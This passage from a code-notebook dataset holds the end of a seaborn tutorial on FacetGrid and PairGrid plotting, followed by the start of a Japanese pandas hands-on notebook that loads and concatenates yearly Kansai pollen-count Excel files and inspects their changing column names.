figure size, as in the case of :func:`lmplot` where you can set the height and aspect ratio for each facet rather than the overall size of the figure. Any function that uses one of these objects will always return it after plotting, though, and most of these objects have convenience methods for changing how the plot is drawn, often in a more abstract and easy way.",
"_____no_output_____"
]
],
[
[
"import seaborn as sns\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"sns.set(style=\"ticks\")",
"_____no_output_____"
],
[
"%matplotlib inline\nimport numpy as np\nnp.random.seed(sum(map(ord, \"axis_grids\")))",
"_____no_output_____"
]
],
[
[
".. _facet_grid:\n\nConditional small multiples\n---------------------------\n\nThe :class:`FacetGrid` class is useful when you want to visualize the distribution of a variable or the relationship between multiple variables separately within subsets of your dataset. A :class:`FacetGrid` can be drawn with up to three dimensions: ``row``, ``col``, and ``hue``. The first two have obvious correspondence with the resulting array of axes; think of the hue variable as a third dimension along a depth axis, where different levels are plotted with different colors.\n\nThe class is used by initializing a :class:`FacetGrid` object with a dataframe and the names of the variables that will form the row, column, or hue dimensions of the grid. These variables should be categorical or discrete, and then the data at each level of the variable will be used for a facet along that axis. For example, say we wanted to examine differences between lunch and dinner in the ``tips`` dataset.\n\nAdditionally, each of :func:`relplot`, :func:`catplot`, and :func:`lmplot` use this object internally, and they return the object when they are finished so that it can be used for further tweaking.",
"_____no_output_____"
]
],
[
[
"tips = sns.load_dataset(\"tips\")",
"_____no_output_____"
],
[
"g = sns.FacetGrid(tips, col=\"time\")",
"_____no_output_____"
]
],
[
[
"Initializing the grid like this sets up the matplotlib figure and axes, but doesn't draw anything on them.\n\nThe main approach for visualizing data on this grid is with the :meth:`FacetGrid.map` method. Provide it with a plotting function and the name(s) of variable(s) in the dataframe to plot. Let's look at the distribution of tips in each of these subsets, using a histogram.",
"_____no_output_____"
]
],
[
[
"g = sns.FacetGrid(tips, col=\"time\")\ng.map(plt.hist, \"tip\");",
"_____no_output_____"
]
],
[
[
"This function will draw the figure and annotate the axes, hopefully producing a finished plot in one step. To make a relational plot, just pass multiple variable names. You can also provide keyword arguments, which will be passed to the plotting function:",
"_____no_output_____"
]
],
[
[
"g = sns.FacetGrid(tips, col=\"sex\", hue=\"smoker\")\ng.map(plt.scatter, \"total_bill\", \"tip\", alpha=.7)\ng.add_legend();",
"_____no_output_____"
]
],
[
[
"There are several options for controlling the look of the grid that can be passed to the class constructor.",
"_____no_output_____"
]
],
[
[
"g = sns.FacetGrid(tips, row=\"smoker\", col=\"time\", margin_titles=True)\ng.map(sns.regplot, \"size\", \"total_bill\", color=\".3\", fit_reg=False, x_jitter=.1);",
"_____no_output_____"
]
],
[
[
"Note that ``margin_titles`` isn't formally supported by the matplotlib API, and may not work well in all cases. In particular, it currently can't be used with a legend that lies outside of the plot.\n\nThe size of the figure is set by providing the height of *each* facet, along with the aspect ratio:",
"_____no_output_____"
]
],
[
[
"g = sns.FacetGrid(tips, col=\"day\", height=4, aspect=.5)\ng.map(sns.barplot, \"sex\", \"total_bill\");",
"_____no_output_____"
]
],
[
[
"The default ordering of the facets is derived from the information in the DataFrame. If the variable used to define facets has a categorical type, then the order of the categories is used. Otherwise, the facets will be in the order of appearance of the category levels. It is possible, however, to specify an ordering of any facet dimension with the appropriate ``*_order`` parameter:",
"_____no_output_____"
]
],
[
[
"ordered_days = tips.day.value_counts().index\ng = sns.FacetGrid(tips, row=\"day\", row_order=ordered_days,\n height=1.7, aspect=4,)\ng.map(sns.distplot, \"total_bill\", hist=False, rug=True);",
"_____no_output_____"
]
],
[
[
"Any seaborn color palette (i.e., something that can be passed to :func:`color_palette()` can be provided. You can also use a dictionary that maps the names of values in the ``hue`` variable to valid matplotlib colors:",
"_____no_output_____"
]
],
[
[
"pal = dict(Lunch=\"seagreen\", Dinner=\"gray\")\ng = sns.FacetGrid(tips, hue=\"time\", palette=pal, height=5)\ng.map(plt.scatter, \"total_bill\", \"tip\", s=50, alpha=.7, linewidth=.5, edgecolor=\"white\")\ng.add_legend();",
"_____no_output_____"
]
],
[
[
"You can also let other aspects of the plot vary across levels of the hue variable, which can be helpful for making plots that will be more comprehensible when printed in black-and-white. To do this, pass a dictionary to ``hue_kws`` where keys are the names of plotting function keyword arguments and values are lists of keyword values, one for each level of the hue variable.",
"_____no_output_____"
]
],
[
[
"g = sns.FacetGrid(tips, hue=\"sex\", palette=\"Set1\", height=5, hue_kws={\"marker\": [\"^\", \"v\"]})\ng.map(plt.scatter, \"total_bill\", \"tip\", s=100, linewidth=.5, edgecolor=\"white\")\ng.add_legend();",
"_____no_output_____"
]
],
[
[
"If you have many levels of one variable, you can plot it along the columns but \"wrap\" them so that they span multiple rows. When doing this, you cannot use a ``row`` variable.",
"_____no_output_____"
]
],
[
[
"attend = sns.load_dataset(\"attention\").query(\"subject <= 12\")\ng = sns.FacetGrid(attend, col=\"subject\", col_wrap=4, height=2, ylim=(0, 10))\ng.map(sns.pointplot, \"solutions\", \"score\", color=\".3\", ci=None);",
"_____no_output_____"
]
],
[
[
"Once you've drawn a plot using :meth:`FacetGrid.map` (which can be called multiple times), you may want to adjust some aspects of the plot. There are also a number of methods on the :class:`FacetGrid` object for manipulating the figure at a higher level of abstraction. The most general is :meth:`FacetGrid.set`, and there are other more specialized methods like :meth:`FacetGrid.set_axis_labels`, which respects the fact that interior facets do not have axis labels. For example:",
"_____no_output_____"
]
],
[
[
"with sns.axes_style(\"white\"):\n g = sns.FacetGrid(tips, row=\"sex\", col=\"smoker\", margin_titles=True, height=2.5)\ng.map(plt.scatter, \"total_bill\", \"tip\", color=\"#334488\", edgecolor=\"white\", lw=.5);\ng.set_axis_labels(\"Total bill (US Dollars)\", \"Tip\");\ng.set(xticks=[10, 30, 50], yticks=[2, 6, 10]);\ng.fig.subplots_adjust(wspace=.02, hspace=.02);",
"_____no_output_____"
]
],
[
[
"For even more customization, you can work directly with the underling matplotlib ``Figure`` and ``Axes`` objects, which are stored as member attributes at ``fig`` and ``axes`` (a two-dimensional array), respectively. When making a figure without row or column faceting, you can also use the ``ax`` attribute to directly access the single axes.",
"_____no_output_____"
]
],
[
[
"g = sns.FacetGrid(tips, col=\"smoker\", margin_titles=True, height=4)\ng.map(plt.scatter, \"total_bill\", \"tip\", color=\"#338844\", edgecolor=\"white\", s=50, lw=1)\nfor ax in g.axes.flat:\n ax.plot((0, 50), (0, .2 * 50), c=\".2\", ls=\"--\")\ng.set(xlim=(0, 60), ylim=(0, 14));",
"_____no_output_____"
]
],
[
[
".. _custom_map_func:\n\nUsing custom functions\n----------------------\n\nYou're not limited to existing matplotlib and seaborn functions when using :class:`FacetGrid`. However, to work properly, any function you use must follow a few rules:\n\n1. It must plot onto the \"currently active\" matplotlib ``Axes``. This will be true of functions in the ``matplotlib.pyplot`` namespace, and you can call ``plt.gca`` to get a reference to the current ``Axes`` if you want to work directly with its methods.\n2. It must accept the data that it plots in positional arguments. Internally, :class:`FacetGrid` will pass a ``Series`` of data for each of the named positional arguments passed to :meth:`FacetGrid.map`.\n3. It must be able to accept ``color`` and ``label`` keyword arguments, and, ideally, it will do something useful with them. In most cases, it's easiest to catch a generic dictionary of ``**kwargs`` and pass it along to the underlying plotting function.\n\nLet's look at minimal example of a function you can plot with. This function will just take a single vector of data for each facet:",
"_____no_output_____"
]
],
[
[
"from scipy import stats\ndef quantile_plot(x, **kwargs):\n qntls, xr = stats.probplot(x, fit=False)\n plt.scatter(xr, qntls, **kwargs)\n \ng = sns.FacetGrid(tips, col=\"sex\", height=4)\ng.map(quantile_plot, \"total_bill\");",
"_____no_output_____"
]
],
[
[
"If we want to make a bivariate plot, you should write the function so that it accepts the x-axis variable first and the y-axis variable second:",
"_____no_output_____"
]
],
[
[
"def qqplot(x, y, **kwargs):\n _, xr = stats.probplot(x, fit=False)\n _, yr = stats.probplot(y, fit=False)\n plt.scatter(xr, yr, **kwargs)\n \ng = sns.FacetGrid(tips, col=\"smoker\", height=4)\ng.map(qqplot, \"total_bill\", \"tip\");",
"_____no_output_____"
]
],
[
[
"Because ``plt.scatter`` accepts ``color`` and ``label`` keyword arguments and does the right thing with them, we can add a hue facet without any difficulty:",
"_____no_output_____"
]
],
[
[
"g = sns.FacetGrid(tips, hue=\"time\", col=\"sex\", height=4)\ng.map(qqplot, \"total_bill\", \"tip\")\ng.add_legend();",
"_____no_output_____"
]
],
[
[
"This approach also lets us use additional aesthetics to distinguish the levels of the hue variable, along with keyword arguments that won't be dependent on the faceting variables:",
"_____no_output_____"
]
],
[
[
"g = sns.FacetGrid(tips, hue=\"time\", col=\"sex\", height=4,\n hue_kws={\"marker\": [\"s\", \"D\"]})\ng.map(qqplot, \"total_bill\", \"tip\", s=40, edgecolor=\"w\")\ng.add_legend();",
"_____no_output_____"
]
],
[
[
"Sometimes, though, you'll want to map a function that doesn't work the way you expect with the ``color`` and ``label`` keyword arguments. In this case, you'll want to explicitly catch them and handle them in the logic of your custom function. For example, this approach will allow use to map ``plt.hexbin``, which otherwise does not play well with the :class:`FacetGrid` API:",
"_____no_output_____"
]
],
[
[
"def hexbin(x, y, color, **kwargs):\n cmap = sns.light_palette(color, as_cmap=True)\n plt.hexbin(x, y, gridsize=15, cmap=cmap, **kwargs)\n\nwith sns.axes_style(\"dark\"):\n g = sns.FacetGrid(tips, hue=\"time\", col=\"time\", height=4)\ng.map(hexbin, \"total_bill\", \"tip\", extent=[0, 50, 0, 10]);",
"_____no_output_____"
]
],
[
[
".. _pair_grid:\n\nPlotting pairwise data relationships\n------------------------------------\n\n:class:`PairGrid` also allows you to quickly draw a grid of small subplots using the same plot type to visualize data in each. In a :class:`PairGrid`, each row and column is assigned to a different variable, so the resulting plot shows each pairwise relationship in the dataset. This style of plot is sometimes called a \"scatterplot matrix\", as this is the most common way to show each relationship, but :class:`PairGrid` is not limited to scatterplots.\n\nIt's important to understand the differences between a :class:`FacetGrid` and a :class:`PairGrid`. In the former, each facet shows the same relationship conditioned on different levels of other variables. In the latter, each plot shows a different relationship (although the upper and lower triangles will have mirrored plots). Using :class:`PairGrid` can give you a very quick, very high-level summary of interesting relationships in your dataset.\n\nThe basic usage of the class is very similar to :class:`FacetGrid`. First you initialize the grid, then you pass plotting function to a ``map`` method and it will be called on each subplot. There is also a companion function, :func:`pairplot` that trades off some flexibility for faster plotting.\n",
"_____no_output_____"
]
],
[
[
"iris = sns.load_dataset(\"iris\")\ng = sns.PairGrid(iris)\ng.map(plt.scatter);",
"_____no_output_____"
]
],
[
[
"It's possible to plot a different function on the diagonal to show the univariate distribution of the variable in each column. Note that the axis ticks won't correspond to the count or density axis of this plot, though.",
"_____no_output_____"
]
],
[
[
"g = sns.PairGrid(iris)\ng.map_diag(plt.hist)\ng.map_offdiag(plt.scatter);",
"_____no_output_____"
]
],
[
[
"A very common way to use this plot colors the observations by a separate categorical variable. For example, the iris dataset has four measurements for each of three different species of iris flowers so you can see how they differ.",
"_____no_output_____"
]
],
[
[
"g = sns.PairGrid(iris, hue=\"species\")\ng.map_diag(plt.hist)\ng.map_offdiag(plt.scatter)\ng.add_legend();",
"_____no_output_____"
]
],
[
[
"By default every numeric column in the dataset is used, but you can focus on particular relationships if you want.",
"_____no_output_____"
]
],
[
[
"g = sns.PairGrid(iris, vars=[\"sepal_length\", \"sepal_width\"], hue=\"species\")\ng.map(plt.scatter);",
"_____no_output_____"
]
],
[
[
"It's also possible to use a different function in the upper and lower triangles to emphasize different aspects of the relationship.",
"_____no_output_____"
]
],
[
[
"g = sns.PairGrid(iris)\ng.map_upper(plt.scatter)\ng.map_lower(sns.kdeplot)\ng.map_diag(sns.kdeplot, lw=3, legend=False);",
"_____no_output_____"
]
],
[
[
"The square grid with identity relationships on the diagonal is actually just a special case, and you can plot with different variables in the rows and columns.",
"_____no_output_____"
]
],
[
[
"g = sns.PairGrid(tips, y_vars=[\"tip\"], x_vars=[\"total_bill\", \"size\"], height=4)\ng.map(sns.regplot, color=\".3\")\ng.set(ylim=(-1, 11), yticks=[0, 5, 10]);",
"_____no_output_____"
]
],
[
[
"Of course, the aesthetic attributes are configurable. For instance, you can use a different palette (say, to show an ordering of the ``hue`` variable) and pass keyword arguments into the plotting functions.",
"_____no_output_____"
]
],
[
[
"g = sns.PairGrid(tips, hue=\"size\", palette=\"GnBu_d\")\ng.map(plt.scatter, s=50, edgecolor=\"white\")\ng.add_legend();",
"_____no_output_____"
]
],
[
[
":class:`PairGrid` is flexible, but to take a quick look at a dataset, it can be easier to use :func:`pairplot`. This function uses scatterplots and histograms by default, although a few other kinds will be added (currently, you can also plot regression plots on the off-diagonals and KDEs on the diagonal).",
"_____no_output_____"
]
],
[
[
"sns.pairplot(iris, hue=\"species\", height=2.5);",
"_____no_output_____"
]
],
[
[
"You can also control the aesthetics of the plot with keyword arguments, and it returns the :class:`PairGrid` instance for further tweaking.",
"_____no_output_____"
]
],
[
[
"g = sns.pairplot(iris, hue=\"species\", palette=\"Set2\", diag_kind=\"kde\", height=2.5)",
"_____no_output_____"
]
],
[
[
".. raw:: html\n\n </div>",
"_____no_output_____"
]
]
] | [
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw",
"code",
"raw"
] | [
[
"raw",
"raw",
"raw"
],
[
"code",
"code",
"code"
],
[
"raw"
],
[
"code",
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
],
[
"code"
],
[
"raw"
]
] |
cb2aad9b6369e6a11edbdacfdeb4f4a800e60053 | 144,934 | ipynb | Jupyter Notebook | work/03_concat_df.ipynb | hannari-python/pandas-handson | f5d40228a0df8607acacacf8a5744b756a42fc39 | [
"Apache-2.0"
] | 7 | 2019-03-15T05:06:45.000Z | 2021-06-26T03:26:35.000Z | work/03_concat_df.ipynb | hannari-python/pandas-handson | f5d40228a0df8607acacacf8a5744b756a42fc39 | [
"Apache-2.0"
] | 1 | 2019-03-03T05:18:56.000Z | 2019-03-03T05:42:34.000Z | work/03_concat_df.ipynb | hannari-python/pandas-handson | f5d40228a0df8607acacacf8a5744b756a42fc39 | [
"Apache-2.0"
] | 3 | 2019-03-03T05:12:34.000Z | 2019-03-17T14:04:00.000Z | 41.961204 | 17,784 | 0.492673 | [
[
[
"**handson用資料としての注意点**\n\n普通、同じセル上で何度も試行錯誤するので、最終的に上手くいったセルしか残らず、失敗したセルは残りませんし、わざわざ残しません。\n\n今回はhandson用に 試行・思考過程を残したいと思い、エラーやミスが出ても下のセルに進んで処理を実行するようにしています。\n\nnotebookのセル単位の実行ができるからこそのやり方かもしれません。良い。\n\n(下のセルから文は常体で書きます。)\n\nkunai (@jdgthjdg)\n\n---\n",
"_____no_output_____"
],
[
"# ここまでの処理を整理して、2008〜2019のデータを繋いでみる",
"_____no_output_____"
],
[
"## xls,xlsxファイルを漁る",
"_____no_output_____"
]
],
[
[
"from pathlib import Path",
"_____no_output_____"
],
[
"base_dir = Path(\"../../../data\") # 相対パスが違うかも ../ の調整でいけるはず・・・\nbase_dir.exists()",
"_____no_output_____"
],
[
"list(base_dir.glob(\"*_kansai/*\"))",
"_____no_output_____"
],
[
"p = list(base_dir.glob(\"*_kansai/*\"))[0]\np.name",
"_____no_output_____"
],
[
"kansai_kafun_files = []\nfor p in base_dir.glob(\"*_kansai/*\"):\n # AMeDASだけ弾く\n if not p.name.startswith(\"AMeDAS\"):\n kansai_kafun_files.append(p)\nkansai_kafun_files",
"_____no_output_____"
]
],
[
[
"lock ファイルが混じってしまった。<BR>\nAMeDASだけ弾くと .lockファイルも入ってしまう(この時私がこのファイルをエクセル互換ソフトで開いていたため、.lockファイルが生成された)ので、<br>\n試しに **読めない文字 ( ë╘ò▓âfü[â )** で引っ掛けてみる",
"_____no_output_____"
]
],
[
[
"kansai_kafun_files = []\nfor p in base_dir.glob(\"*_kansai/*\"):\n # AMeDASだけ弾くと .lockファイルも入ってしまうので、読めない謎の文字で引っ掛けてみる\n if p.name.startswith(\"ë╘ò▓âfü[â\"):\n kansai_kafun_files.append(p)\nkansai_kafun_files",
"_____no_output_____"
]
],
[
[
"いけた(環境によっていけないみたいなので、その時は一つ上の、AMeDASを弾くパターンで)",
"_____no_output_____"
],
[
"ソートしてもいいけど、どのみち日付データはとるのでこのまま",
"_____no_output_____"
],
[
"---",
"_____no_output_____"
],
[
"# 今までの処理を適用していく",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n#設定でDataFrameなどが長く表示されないようにします(画面領域の消費を抑えてhandsonをしやすくするため)\n# 長い場合の途中の省略表示(...)を出す閾値の設定(折り返しとは無関係)\npd.set_option('max_rows',10)\npd.set_option('max_columns',20) # これを超えたら全部は表示しない。 A B C ... X Y Z のように途中を省く。",
"_____no_output_____"
],
[
"p = kansai_kafun_files[-1]\nprint(p)\ndf = pd.read_excel(p, skiprows=1).iloc[:,:-2]\ndf",
"../../../data/2013_kansai/ë╘ò▓âfü[â^2013(è╓É╝).xls\n"
],
[
"str_concat_h0_23 = df[\"年\"].astype(str)+\"/\"+df[\"月\"].astype(str)+\"/\"+df[\"日\"].astype(str)+\"/\"+(df[\"時\"]-1).astype(str) # 時から1引いてる\ndf[\"date_hour\"] = pd.to_datetime(str_concat_h0_23, format=\"%Y/%m/%d/%H\")\ndf.set_index(\"date_hour\", inplace=True)\ndf = df.drop(columns=[\"年\",\"月\",\"日\",\"時\",]) # こっちでも全然良い\ndf",
"_____no_output_____"
]
],
[
[
"# ここまでを関数にする",
"_____no_output_____"
],
[
"多くの試行錯誤があったがこれだけのコードに圧縮された・・・",
"_____no_output_____"
]
],
[
[
"def load_kafun_excel(path):\n df = pd.read_excel(path, skiprows=1).iloc[:,:-2]\n str_concat_h0_23 = df[\"年\"].astype(str)+\"/\"+df[\"月\"].astype(str)+\"/\"+df[\"日\"].astype(str)+\"/\"+(df[\"時\"]-1).astype(str) # 時から1引いてる\n df[\"date_hour\"] = pd.to_datetime(str_concat_h0_23, format=\"%Y/%m/%d/%H\")\n df.set_index(\"date_hour\", inplace=True)\n df = df.drop(columns=[\"年\",\"月\",\"日\",\"時\",]) # こっちでも全然良い\n return df",
"_____no_output_____"
],
[
"load_kafun_excel(p)",
"_____no_output_____"
]
],
[
[
"## for文で回す",
"_____no_output_____"
]
],
[
[
"kansai_kafun_files",
"_____no_output_____"
],
[
"kafun_df_list = []\nfor p in kansai_kafun_files:\n df = load_kafun_excel(p)\n kafun_df_list.append(df)",
"_____no_output_____"
],
[
"kafun_df_list[0].shape",
"_____no_output_____"
]
],
[
[
"# リスト内のdfを行方向(縦方向, y方向)に連結する",
"_____no_output_____"
],
[
"### **[pd.concat](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.concat.html)**\n\ndf の連結/結合/マージ \nhttp://pandas.pydata.org/pandas-docs/stable/user_guide/merging.html\n",
"_____no_output_____"
]
],
[
[
"kafun = pd.concat(kafun_df_list, axis=1)\nkafun.shape",
"_____no_output_____"
],
[
"kafun.columns",
"_____no_output_____"
]
],
[
[
"<br>\nミスってcolumnsの数が成長した。横方向につながっている \n<br>\n<br>",
"_____no_output_____"
]
],
[
[
"kafun = pd.concat(kafun_df_list, axis=0) # Warning",
"/opt/conda/lib/python3.7/site-packages/ipykernel_launcher.py:1: FutureWarning: Sorting because non-concatenation axis is not aligned. A future version\nof pandas will change to not sort by default.\n\nTo accept the future behavior, pass 'sort=False'.\n\nTo retain the current behavior and silence the warning, pass 'sort=True'.\n\n \"\"\"Entry point for launching an IPython kernel.\n"
]
],
[
[
"warning された。 今後ソートしないとのこと",
"_____no_output_____"
]
],
[
[
"kafun = pd.concat(kafun_df_list, axis=0, sort=False)\nkafun.shape",
"_____no_output_____"
]
],
[
[
"このaxis方向でも columns が倍くらいに増えている・・・",
"_____no_output_____"
]
],
[
[
"kafun.columns",
"_____no_output_____"
]
],
[
[
"恐らく年が変わった時に列の名前が変わったようだ(多分担当者も) \nデータのフォーマットが変わると、恐ろしく面倒なことが起きる・・・",
"_____no_output_____"
]
],
[
[
"kafun_df_list[0].columns",
"_____no_output_____"
],
[
"kafun_df_list[1].columns",
"_____no_output_____"
]
],
[
[
"# 想像以上に全然違う・・・\n\nファイル名をみる",
"_____no_output_____"
]
],
[
[
"kansai_kafun_files[0].name",
"_____no_output_____"
],
[
"kansai_kafun_files[1].name",
"_____no_output_____"
]
],
[
[
"xlsとxlsxの頃から変わったのかも? とりあえず ロードした時にcolumnsを表示する雑な関数を作って試す",
"_____no_output_____"
]
],
[
[
"def show_columns(path):\n df = pd.read_excel(path, skiprows=1).iloc[:,:-2]\n return df.columns",
"_____no_output_____"
],
[
"for p in kansai_kafun_files:\n print(p, show_columns(p))",
"../../../data/2010_kansai/ë╘ò▓âfü[â^2010(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '山崎', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2017_kansai/ë╘ò▓âfü[â^2017(è╓É╝).xlsx Index(['年', '月', '日', '時', '彦根市役所', '滋賀県琵琶湖・環境科学研究センター', '滋賀県高島合同庁舎',\n '滋賀県林業普及センター', '京都府立医科大学', '京都府中丹東保健所', '京都市右京区役所京北合同庁舎',\n '大阪合同庁舎第2号館別館', '豊中市役所第一庁舎', '泉大津市役所', '兵庫県立健康環境科学研究センター', '北山緑化植物園',\n '兵庫県篠山庁舎', '西播磨県民局西播磨総合庁舎', '奈良県産業振興総合センター', '奈良県吉野保健所', '橿原総合庁舎',\n '和歌山地方気象台', '和歌山県西牟婁振興局庁舎', '和歌山県東牟婁振興局'],\n dtype='object')\n../../../data/2015_kansai/ë╘ò▓âfü[â^2015(è╓É╝).xlsx Index(['年', '月', '日', '時', '彦根市役所', '滋賀県琵琶湖・環境科学研究センター', '滋賀県高島合同庁舎',\n '滋賀県森林センター', '京都府立医科大学', '京都府中丹東保健所', '京都市右京区役所京北合同庁舎',\n '大阪府環境農林水産総合研究所', '豊中市役所第一庁舎', '泉大津市役所', '兵庫県立健康環境科学研究センター', '北山緑化植物園',\n '兵庫県篠山庁舎', '西播磨県民局西播磨総合庁舎', '奈良県産業振興総合センター', '奈良県吉野保健所', '橿原総合庁舎',\n '和歌山地方気象台', '和歌山県西牟婁振興局庁舎', '和歌山県東牟婁振興局'],\n dtype='object')\n../../../data/2009_kansai/ë╘ò▓âfü[â^2009(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '山崎', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2014_kansai/ë╘ò▓âfü[â^2014(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '西播磨', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2012_kansai/ë╘ò▓âfü[â^2012(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '西播磨', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2008_kansai/ë╘ò▓âfü[â^2008(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '山崎', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2016_kansai/ë╘ò▓âfü[â^2016(è╓É╝).xlsx Index(['年', '月', '日', '時', '彦根市役所', '滋賀県琵琶湖・環境科学研究センター', '滋賀県高島合同庁舎',\n '滋賀県林業普及センター', '京都府立医科大学', '京都府中丹東保健所', '京都市右京区役所京北合同庁舎',\n '大阪府環境農林水産総合研究所', '豊中市役所第一庁舎', '泉大津市役所', '兵庫県立健康環境科学研究センター', '北山緑化植物園',\n '兵庫県篠山庁舎', '西播磨県民局西播磨総合庁舎', '奈良県産業振興総合センター', '奈良県吉野保健所', '橿原総合庁舎',\n '和歌山地方気象台', '和歌山県西牟婁振興局庁舎', '和歌山県東牟婁振興局'],\n dtype='object')\n../../../data/2018_kansai/ë╘ò▓âfü[â^2018(è╓É╝).xlsx Index(['年', '月', '日', '時', '彦根地方気象台', '滋賀県琵琶湖・環境科学研究センター', '滋賀県高島合同庁舎',\n '京都府立医科大学', '舞鶴市西コミュニティセンター', '京都市右京区役所京北合同庁舎', '大阪合同庁舎第2号館別館',\n '豊中市役所第一庁舎', '泉大津市役所', '兵庫県立健康環境科学研究センター', '北山緑化植物園', '兵庫県篠山庁舎',\n '兵庫県環境研究センター', '奈良県産業振興総合センター', '奈良県吉野保健所', '橿原総合庁舎', '和歌山地方気象台',\n '和歌山県西牟婁振興局庁舎', '和歌山県東牟婁振興局'],\n dtype='object')\n../../../data/2011_kansai/ë╘ò▓âfü[â^2011(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '山崎', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2013_kansai/ë╘ò▓âfü[â^2013(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '西播磨', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n"
]
],
[
[
"<br>\n年が順不同で見にくいので結局ソートしてみる",
"_____no_output_____"
]
],
[
[
"sorted(kansai_kafun_files) ",
"_____no_output_____"
]
],
[
[
"---\n**もしソートがうまくいかないパスだったら sorted の key=を設定する**",
"_____no_output_____"
]
],
[
[
"p.name[10:14] # ファイル名から年を抜き出すスライスがこれだった",
"_____no_output_____"
],
[
"# フォルダ名にかかわらず、ファイル名の 20xx で数値のソートされる\nsorted(kansai_kafun_files, key=lambda x:int(x.name[10:14]))",
"_____no_output_____"
],
[
"sorted(kansai_kafun_files, key=lambda x: (-1)*int(x.name[10:14])) # マイナスにすれば逆になるのが分かる",
"_____no_output_____"
]
],
[
[
"<br>\nソート後にまた columns を見る",
"_____no_output_____"
]
],
[
[
"for p in sorted(kansai_kafun_files):\n print(p, show_columns(p))",
"../../../data/2008_kansai/ë╘ò▓âfü[â^2008(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '山崎', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2009_kansai/ë╘ò▓âfü[â^2009(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '山崎', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2010_kansai/ë╘ò▓âfü[â^2010(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '山崎', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2011_kansai/ë╘ò▓âfü[â^2011(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '山崎', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2012_kansai/ë╘ò▓âfü[â^2012(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '西播磨', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n dtype='object')\n../../../data/2013_kansai/ë╘ò▓âfü[â^2013(è╓É╝).xls Index(['年', '月', '日', '時', '彦根', '大津', '今津', '野洲', '京都', '舞鶴', '京北', '大阪',\n '豊中', '河内長野', '神戸', '西宮', '篠山', '西播磨', '奈良', '吉野', '大和高田', '和歌山', '田辺',\n '中辺路'],\n 